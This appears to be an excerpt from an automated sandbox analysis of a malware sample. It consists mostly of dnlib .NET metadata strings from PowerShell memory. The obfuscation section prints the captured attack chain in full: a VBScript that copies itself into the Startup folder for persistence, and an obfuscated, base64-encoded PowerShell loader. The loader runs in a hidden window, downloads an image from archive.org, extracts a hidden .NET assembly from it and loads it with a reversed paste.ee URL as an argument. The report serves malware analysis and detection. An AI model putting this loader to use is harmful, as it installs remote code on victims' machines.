            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\figurante.vbs");IFileSystem3.CopyFile("C:\Windows\system32\Logistics1.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\figurante.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczo", "0", "false")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"Jump to behavior
